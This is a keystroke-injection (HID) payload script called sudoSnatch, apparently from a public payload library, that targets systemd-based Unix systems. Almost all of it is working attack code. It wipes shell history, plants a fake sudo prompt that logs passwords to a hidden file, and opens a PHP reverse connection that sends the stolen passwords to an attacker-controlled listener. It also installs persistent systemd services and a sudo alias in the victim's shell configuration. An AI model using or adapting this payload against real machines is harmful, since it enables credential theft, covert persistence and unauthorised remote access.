Path: blob/master/payloads/library/credentials/sudoSnatch/payload.txt
2968 views
REM Title: sudoSnatch1REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..2REM AUTHOR: drapl0n3REM Version: 1.04REM Category: Credentials5REM Target: Unix-like operating systems with systemd6REM Attackmodes: HID7REM Note: Replace IP address and port number on line no. 34 with yours.8REM Note: Use command: [nc -l -p <port number>] to fetch captured passwords on attacking machine.910REM [keeping tracks clear]11DELAY 50012CTRL-ALT t13DELAY 40014STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE15ENTER16DELAY 1001718REM [creating password grabbing mechanism]19STRING mkdir /var/tmp/.system20ENTER21DELAY 10022STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr23ENTER24DELAY 10025STRING touch /var/tmp/.system/sysLog26ENTER27DELAY 10028STRING chmod +x /var/tmp/.system/systemMgr29ENTER30DELAY 1003132REM [creating reverse shell]33STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus34ENTER35DELAY 10036STRING chmod +x /var/tmp/.system/systemBus37ENTER38DELAY 1003940REM [creating systemd service to execute payload on boot]41STRING mkdir -p ~/.config/systemd/user42ENTER43DELAY 20044STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service45ENTER46DELAY 1004748REM [creating reboot script incase if listner stops or targets internet connection gets lost]49STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot50ENTER51DELAY 10052STRING chmod +x /var/tmp/.system/reboot53ENTER54DELAY 1005556REM [creating systemd service for reboot]57STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service58ENTER59DELAY 1006061REM [enabling services]62STRING systemctl --user daemon-reload63ENTER64DELAY 30065STRING systemctl --user enable --now systemBUS.service66ENTER67DELAY 15068STRING systemctl --user start --now systemBUS.service69ENTER70DELAY 15071STRING systemctl --user enable --now reboot.service72ENTER73DELAY 15074STRING systemctl --user start --now reboot.service75ENTER76DELAY 1007778REM [autostarting service on terminal/shell launch]79STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp80ENTER81DELAY 10082STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit83ENTER848586